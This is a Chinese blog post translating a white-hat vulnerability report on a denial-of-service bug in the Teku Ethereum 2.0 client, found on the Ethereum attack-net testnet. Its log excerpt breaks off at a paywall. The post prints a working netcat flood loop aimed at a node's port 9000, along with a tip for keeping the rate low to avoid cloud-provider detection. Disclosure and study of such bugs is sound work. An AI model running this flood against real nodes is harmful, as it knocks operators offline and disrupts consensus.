Ethereum DoS Attack on Teku Notes

最新推荐文章于 2022-06-25 00:32:11 发布
最新推荐文章于 2022-06-25 00:32:11 发布
阅读量330 收藏 1
点赞数
分类专栏: 胖达的区块链安全工坊 文章标签: 区块链 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cemao4548/article/details/108054226
版权
本文详细记录了一次针对以太坊2.0客户端Teku的DoS攻击,描述了攻击场景、实施细节以及原理。攻击导致Teku节点内存消耗过大,无法参与共识,影响链的一致性。解决方案是改进节点对无效消息的处理,避免内存占用过多。
摘要由CSDN通过智能技术生成

Abstract

前些日子,以太坊2.0开放了attack-net攻击网环境。白帽子们在此链上对新版本的ETH进行众测。
7月27日,ETH官方确认了第一个漏洞。本文将该漏洞的issue翻译成中文。
发现该漏洞的白帽子为JonnyRhea

Description

该漏洞可导致Teku节点被DoS攻击,从而无法参与共识。

这里说的Teku 是attack-net中一条测试链的名字
同样是Attack-net测试链的还有 prysm、lighthouse

Attack scenario

  1. 这个DoS攻击将持续破坏链节点的一致性。
  2. 等到攻击停止后,需要手动修复,ETH才能恢复运行。
  3. 受害者节点的内存将被大量消耗。最终导致宿主机重启。
  4. 受害者节点的本地时钟会变慢。(had trouble staying connected to peers and one node's local clock was 20 mins slow.)

Details

How the attack was implemented

  • DoS攻击命令如下:
    while true; do cat /dev/zero | pv -L 1M |nc XXX.XXX.XXX.XXX 9000 >/dev/null; done
    其中XXX.XXX.XXX.XXX是被攻击节点地址。

上述命令,是以1M/s的速率向目标节点的9000端口发送垃圾数据。
虽说发送垃圾数据的速率是越高越好,但是由于实验环境部署在AWS服务器上,
为了避免DoS攻击被AWS-ISP发现,只能将每个攻击节点的数据发送速率限制在1M/s。

  • 当攻击启动时,界面如下:
    DoS攻击界面
    我们可以看到Ncat: Connection reset by peer,也就是说目标节点已经崩溃。

Attack log

Epoch 407, Slot 13038

在区块高度407,jrhea正在研究前文命令的参数(1M/s等(cy))会对节点造成怎样的影响。

jrhea(本文作者,编写漏洞报告)在实验中部署了5个节点来执行上述命令,发起DoS攻击。

14:49:44.309 INFO  - Epoch Event *** Epoch: 407, Justified checkpoint: 405, Finalized checkpoint: 404, Finalized root: 062423..e652
14:49:48.308 INFO  - Slot Event  *** Slot: 13024, Block: 615a62..0c80, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:50:00.308 INFO  - Slot Event  *** Slot: 13025, Block: 8a66bc..feaa, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:50:12.313 INFO  - Slot Event  *** Slot: 13026, Block: 6e35b1..ab31, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:50:24.312 INFO  - Slot Event  *** Slot: 13027, Block: bd188c..2c39, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:50:36.308 INFO  - Slot Event  *** Slot: 13028, Block: 1b0189..b486, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:50:48.308 INFO  - Slot Event  *** Slot: 13029, Block: 434b19..dc64, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:51:00.311 INFO  - Slot Event  *** Slot: 13030, Block: d092fa..b2d7, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:51:12.308 INFO  - Slot Event  *** Slot: 13031, Block: 9e7060..95b2, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:51:24.307 INFO  - Slot Event  *** Slot: 13032, Block: e57155..e417, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:51:36.312 INFO  - Slot Event  *** Slot: 13033, Block: 0ffe8c..e62f, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:51:48.386 INFO  - Slot Event  *** Slot: 13034, Block: 8c383d..7c25, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:52:00.439 INFO  - Slot Event  *** Slot: 13035, Block: fea7e4..b7fa, Epoch: 407, Finalized checkpoint: 405, Finalized root: 3e178e..4e06, Peers: 4
14:52:12.321 INFO  - Slot Event  *** Slot: 13036, Blo
最低0.47元/天 解锁文章
可爱多多白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
读书笔记(九)-- Ethereum contract attack
读书笔记
10-26 861
Atzei, Nicola, Massimo Bartoletti, and Tiziana Cmoli. "A survey of attacks on Ethereum smart contracts."IACR Cryptology ePrint Archive 2016 (2016): 1007. A. Problem Statement The paper targets the p...
DoS网络攻击的类型
jackyyang_cn的专栏
03-22 870
列举一些已有的DoS攻击方式,针对IPv4的TCP/IP协议栈。代码及分析随后奉上。
dos设置yymmdd时间格式_硬核丨区块链浏览器可以逃离DoS的九阴白骨爪吗?
weixin_32549035的博客
12-01 200
说到浏览器,大家脑海里蹦出来的一定是“百度一下,你就知道”、“上网从搜狗开始”......这些家喻户晓甚至大爷都说的上来的浏览器,是互联网的代言人,更是互联网的入口。但是如果说有谁和互联网是勾肩搭背的关系,那就是现今如日中天的区块链技术了。互联网改变生活,区块链技术改变互联网。那么毫无疑问,作为互联网的入口,浏览器必然也与区块链技术脱不开关系。由此诞生的区块链浏览器,作为大家耳熟能详的落...
网络攻击术语(Technical terms of the attacks)
MonRain7026
09-10 5378
网络攻击术语(Technical terms of the attacks) 一、spoofing or impersonation attack 欺诈或模拟(冒充)攻击 一般表现为窃取身份认证凭据(authentication credentials)来实现非法服务接入(unauthorized service access) 窃取authentication credentials一般通过窃听(eavesdropping)信道或伪装(phishing) 这类攻击可以分类为 IP地址欺诈:伪造源IP头头
Ethereum技术架构介绍
Make something people want.
06-25 3469
Ethereum技术架构介绍
ethereum php,digitaldonkey/ethereum-php
weixin_30128191的博客
03-18 502
READMEis a typed PHP-7.1+ interface to Ethereum JSON-RPC API.Check out the latest API documentation.Add library in a composer.json file{"minimum-stability":"dev","autoload": {"psr-4": {"Ethereum\\": "...
Ethereum部署私有合约常见问题汇总
木小鱼的笔记
07-30 4861
常见问题问题1问题描述: callback contain no result Error: authentication needed: password or unlock 这里的问题是当前所用的账户没有被unlock, 故需要解锁。 切换到geth的控制台: 在geth的常用命令:查看当下的账户列表: eth.accounts 查看eth支持的命令:
Mac安装更新ethereum/cpp-ethereum
乞力马扎罗的雪CYF的博客
07-28 7531
安装 注意:要区分以太坊和以太坊钱包,也就是EthereumEthereum Wallet、geth。Ethereum Wallet和geth只不过是以太坊的一个客户端而已。 下面安装的是Ethereum,也就是以太坊环境。这个是最主要的。 还有需要注意的是,所有的brew命令都是会比较慢的,慢慢等。   brew update brew upgrade brew tap eth...
[mobi] Building Ethereum DApps: Decentralized Applications on the Ethereum
07-28
Building Ethereum Dapps teaches Dapps development on the Ethereum blockchain platform. You'll begin with a mental model of how Dapps operate, and then dive into designing and implementing smart ...
Rust Ethereum 2.0 客户端
06-28
灯塔:以太坊 2.0一个开源的 Ethereum 2.0 客户端,用 Rust 编写并由 Sigma Prime 维护。文档概述灯塔是:准备在 Eth2 主网上使用。完全开源,在 Apache 2.0 下获得许可。以安全为中心。Fuzzing 技术已被不断应用,...
Ethereum for Architects and Developers
11-03
and testing, debugging, and deploying smart contracts on your local machine and on the cloud. You’ll cover best practices for writing contracts with ample examples to allow you to write high-quality...
PBFT共识简述
竹林深处小茶馆
02-08 3111
pbft协议 pbft算法是区块链公链项目中的一种共识机制。特点是不仅容错故障节点,同时容忍恶意节点的存在。 作恶节点不仅是,宕机引起的无法发送数据。甚至可能发送相反的回复或者伪造数据。 算法概要 客户端发送请求到primary节点,primary由公式p = V mod R决定,p是节点的编号,V是视图号,R是整个系统中节点的个数。请求的消息格式为<REQUEST,o,t,c>,...
DNBFT共识——一种可动态调节网络节点数的PBFT优化方案
竹林深处小茶馆
02-08 2182
摘要 区块链类比于一种分布式存储系统,这种存储系统有可持续增长,不可篡改的特点。 区块链中的共识是多个节点对某一个状态达成一致的过程。本文研究BFT共识中的安全问题。 国内外对BFT共识的研究 [1]张迪.另一种BFT共识算法在区块链中的应用[J].传播力研究,2019,3(28):272. [2]戴鹏. 基于实用拜占庭共识算法(PBFT)的区块链模型的评估与改进[D].北京邮电大学,2019. ...
GoFuzz模糊测试坑点
竹林深处小茶馆
08-16 961
Abstract 尝试使用 go fuzz 来测试程序,本文记录一下测试过程。 其中遇到了一些新鲜的点,值得记录一下。 1、国内下载安装 gofuzz 的官方安装方法如下 go get github.com/dvyukov/go-fuzz/go-fuzz go get github.com/dvyukov/go-fuzz/go-fuzz-build 但国内服务器可能无法正常下载。 可以运行以下命令来手动安装gofuzz cd $GOPATH/src/github.com/dvyukov/ git clon
以太坊细节(3):StateRoot为什么不能取代ReceiptsRoot
竹林深处小茶馆
05-06 919
背景 在各种区块链项目中(例如以太坊),节点往往需要维护三个 Trie Root https://github.com/ethereum/go-ethereum:44a3b8c04cf18dc0a796f96d5972beb0e3cbe79b:core/types/block.go,L69-86: stateRoot TransactionsRoot ReceiptsRoot 问题在于Recei...
一篇文章看懂cosmos重委托漏洞
竹林深处小茶馆
05-11 871
摘要 Cosmos SDK 在 2019年 5 月底发现存在严重安全漏洞,该团队随后发布了补丁,并与全球验证人共同进行了升级,从收到漏洞报告到修复主网共用了72小时。 攻击者可利用该漏洞绕过委托金赎回时的锁定时间。 在介绍漏洞细节之前,先介绍一下cosmos的投票机制。 staking:投票机制 Cosmos中持币人可以将自己的货币委托给validator,当validator出块时,持币人获得收益。 当持币人遇到了佣金更低、网络状态更好的validator,不想继续委托原来的validator时。 可
PBFT时间敏感性以及攻击方法
竹林深处小茶馆
05-08 844
背景 Andrew Miller 设计了新的共识 HoneyBadgerBFT,论文中提到了BFT共识严重依赖时序假设,所造成的脆弱性。 在论文的附录中,Andrew Miller 介绍了BFT的攻击方法,本文将对该方法进行翻译和介绍。 另外本文不再对BFT的时序脆弱性进行论证,详情可见英文论文或者 中文论文。 正文 PBFT包括两个主要的工作流 1、网络环境良好情况下的正常工作模式(网络节点都同...
精通Ethereum:智能合约与DApp开发指南
"Mastering Ethereum PDF 全英文" Mastering Ethereum 是一本由 Andreas M. Antonopoulos 和 Dr. Gavin Wood 合著的专业指南,旨在帮助读者深入理解以太坊平台及其在去中心化计算领域的应用。这本书面向的是那些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

可爱多多白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值